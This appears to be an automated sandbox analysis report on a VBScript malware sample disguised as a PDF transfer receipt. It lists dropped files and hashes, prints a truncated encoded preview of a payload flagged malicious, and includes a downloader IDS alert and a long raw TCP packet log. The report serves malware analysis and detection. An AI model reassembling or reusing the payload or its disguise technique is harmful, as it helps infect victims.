                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pdicctlj.ruj.ps1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3rcp3fy.ttz.psm1

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Roaming\Margenindstilling.Sys

                                                      Download File
                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                      Category:dropped
                                                      Size (bytes):482192
                                                      Entropy (8bit):5.9563471681230995
                                                      Encrypted:false
                                                      SSDEEP:12288:ESBIp3BYDP3Q7IEtRfb8TPHSjIaAMOMDpV26rGhYWlPlDf:lgBYM7IEtloy0MOMDpYhH
                                                      MD5:2F6D014BFB8401243B95A2D5190524BC
                                                      SHA1:813A93F3ECCE3E6AD2C08D90794246B628C53E30
                                                      SHA-256:4E8209F1210BBC4D89B9894389A5D95902D1B6EF80C651701CC77BB77302CEEB
                                                      SHA-512:715C7EEF4A5A83DD91A38AE4BBFC8EC04C29C2A4E3A3534E21C1F30F7A62C80D1952E9B9CC4FA67E2CB55953CA5CDF957C4DEABE293EDF745EF1E6E523A47FB7
                                                      Malicious:true
                                                      Preview:6wIjLesC6RS7a6QUAOsCbExxAZsDXCQEcQGbcQGbueXeZARxAZvrAu9JgfEDsL5j6wIGH3EBm4Hx5m7aZ3EBm3EBm3EBm+sC9QO6dGyJ2esC7n3rAh3EcQGbcQGbMcrrAskH6wLmuokUC3EBm+sCc/3R4usCnqlxAZuDwQRxAZvrAo3sgflVHrECfMtxAZvrAgiri0QkBOsCkSZxAZuJw+sCpz1xAZuBw246EgJxAZtxAZu6JLDWC3EBm3EBm4HyLJCEZ+sCjmPrAnOOgeoIIFJscQGbcQGbcQGb6wLTWesCknnrAogEiwwQ6wKjpnEBm4kME3EBm3EBm0JxAZtxAZuB+hwJBQB11nEBm3EBm4lcJAxxAZtxAZuB7QADAADrAodn6wLwUotUJAhxAZtxAZuLfCQEcQGb6wJ6QonrcQGbcQGbgcOcAAAAcQGb6wKm0lNxAZvrAph1akBxAZtxAZuJ63EBm3EBm8eDAAEAAADQyALrAgPJ6wIEp4HDAAEAAOsCr11xAZtT6wKDuXEBm4nrcQGb6wKzEom7BAEAAOsC/C5xAZuBwwQBAABxAZvrAiyYU3EBm3EBm2r/cQGbcQGbg8IFcQGbcQGbMfbrAhSx6wJESDHJcQGb6wKIP4sa6wLt4XEBm0HrAtCu6wIUBDkcCnXy6wLa+3EBm0ZxAZvrAmnTgHwK+7h13OsCaKPrAmqWi0QK/HEBm+sCsjMp8OsCFGpxAZv/0usCuVpxAZu6HAkFAHEBm3EBmzHAcQGb6wITH4t8JAxxAZtxAZuBNAfFSzGPcQGb6wJY4IPABOsC0BtxAZs50HXk6wLrausCqaeJ+3EBm3EBm//XcQGbcQGb/JO1ekyu9gq6tM5w67asGUT+TnA6tAbriuCwOrq0znAnkB4SROZOcDq0yrA4631wSDTOcDo+xngC0OLyoh64anwQxKB+c9QOPAEEGfTKwBTclQIPOUywfqRTeklEorh7fwX2y8hLZ7O4aFe2

                                                      Static File Info

                                                      General

                                                      File type:ASCII text, with CRLF line terminators
                                                      Entropy (8bit):4.800774407464648
                                                      TrID:
                                                      • Visual Basic Script (13500/0) 100.00%
                                                      File name:Recibo de transferencia#U00b7pdf.vbs
                                                      File size:82'918 bytes
                                                      MD5:a510a741cf02891a5ae7268b7b92b9b8
                                                      SHA1:2740b1d3da34dab2396388ebb2c97763a3164ce5
                                                      SHA256:b1475086f2f81e2aca88d89cb0620f04e8d0b0a20b956821a0d2efe1b65ce060
                                                      SHA512:f8b09143c1fde918ef01c508c781af213c934d332956c43acbaba6116cd3d3874db8315d1e15eeb8da33e52fc0898569b8c95a5540051be3de48731cf89fb091
                                                      SSDEEP:1536:sjYl/iQZBql+3LAtEhHt1TtcjQ+yztqwT7C25jmiS8ybyf:sjYB7ZAoHCyzMy75y2f
                                                      TLSH:01836293F4CE81370D4302587461A90BCE64F91A213DEA9C7AC7A7379A8367897FD358
                                                      File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

                                                      File Icon

                                                      Icon Hash:68d69b8f86ab9a86

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                      2024-10-01T07:43:02.477762+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449738142.250.184.206443TCP

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 1, 2024 07:42:13.546504974 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:13.546560049 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:13.546751976 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:13.553879023 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:13.553895950 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.207663059 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.207736969 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.208749056 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.208801031 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.212701082 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.212712049 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.212990999 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.225296974 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.267405033 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.624644995 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.624806881 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.625446081 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.625492096 CEST44349730142.250.184.206192.168.2.4
                                                      Oct 1, 2024 07:42:14.625552893 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.628743887 CEST49730443192.168.2.4142.250.184.206
                                                      Oct 1, 2024 07:42:14.640480042 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:14.640552044 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:14.640624046 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:14.641037941 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:14.641052961 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:15.299455881 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:15.299592018 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:15.302654028 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:15.302674055 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:15.303035021 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:15.303966045 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:15.347443104 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.147910118 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.148091078 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.148097992 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.148145914 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.148154974 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.148185968 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.160301924 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.160437107 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.160454035 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.166547060 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.166672945 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.166682005 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.218992949 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.238178015 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.238404989 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.238462925 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.238508940 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.238599062 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.238641024 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.238648891 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.238936901 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.238979101 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.238986969 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.243746996 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.243813992 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.243859053 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.250010014 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.250080109 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.250111103 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.256216049 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.256268978 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.256304026 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.262550116 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.262656927 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.262679100 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.268847942 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.268914938 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.268939018 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.274755955 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.274835110 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.274847031 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.280438900 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.280503035 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.280522108 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.287636995 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.287713051 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.287739038 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.298765898 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.298831940 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.298850060 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.298897982 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.298949957 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.328944921 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329181910 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329256058 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.329273939 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329303026 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329348087 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.329392910 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329571962 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329624891 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.329642057 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329756021 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329802036 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.329809904 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329909086 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.329957962 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.329967976 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.334059954 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.334127903 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.334156990 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.339082003 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.339168072 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.339185953 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.344021082 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.344100952 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.344136000 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.349165916 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.349235058 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.349251986 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.353301048 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.353342056 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.353364944 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.353385925 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.353423119 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.357897997 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.362435102 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.362499952 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.362504005 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.362535000 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.362572908 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.367106915 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.371953964 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.371999979 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.372009039 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.372025013 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.372064114 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.376358986 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.380356073 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.380393982 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.380409002 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.380423069 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.380461931 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.380469084 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.384470940 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.384521008 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.384531975 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.388442993 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.388504982 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.388634920 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.388650894 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.388689041 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.392335892 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.396012068 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.396061897 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.396076918 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.396090031 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.396128893 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.401870012 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.403933048 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.403968096 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.403985023 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.404010057 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.404043913 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.419893026 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.419953108 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.419979095 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420010090 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420042992 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420207024 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.420228958 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420272112 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.420820951 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420881033 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420917034 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.420922995 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.420968056 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.421000957 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.421008110 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.421921968 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.421967030 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.421973944 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.424146891 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.424185038 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.424207926 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.424217939 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.424253941 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.425915956 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.429058075 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.429122925 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.429131985 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.430493116 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.430543900 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.430552006 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.432934999 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.432966948 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.433012962 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.433023930 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.433059931 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.434972048 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.437843084 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.437881947 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.437918901 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.437933922 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.437972069 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.439089060 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.440891981 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.440922976 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.440948009 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.440959930 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.440994024 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.443772078 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.444808006 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.444865942 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.444878101 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.449973106 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.450016975 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.450047970 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.450059891 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.450072050 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.450097084 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.453748941 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.453830004 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.453838110 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.453859091 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.453892946 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.453954935 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.458311081 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.458350897 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.458389997 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.458401918 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.458440065 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.458446980 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.462991953 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.463020086 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.463066101 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.463078976 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.463119030 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.463128090 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.466841936 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.466892958 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.466903925 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.466955900 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.466988087 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.466989994 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.467000008 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.467034101 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.471272945 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.471348047 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.471374989 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.471400023 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.471410036 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.471443892 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.471448898 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.475291014 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.475336075 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.475339890 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.475348949 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.475379944 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.476954937 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.479017019 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.479059935 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.479079008 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.479088068 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.479121923 CEST49731443192.168.2.4142.250.185.97
                                                      Oct 1, 2024 07:42:18.479127884 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.483005047 CEST44349731142.250.185.97192.168.2.4
                                                      Oct 1, 2024 07:42:18.483040094 CEST44349731142.250.185.97192.168.2.4
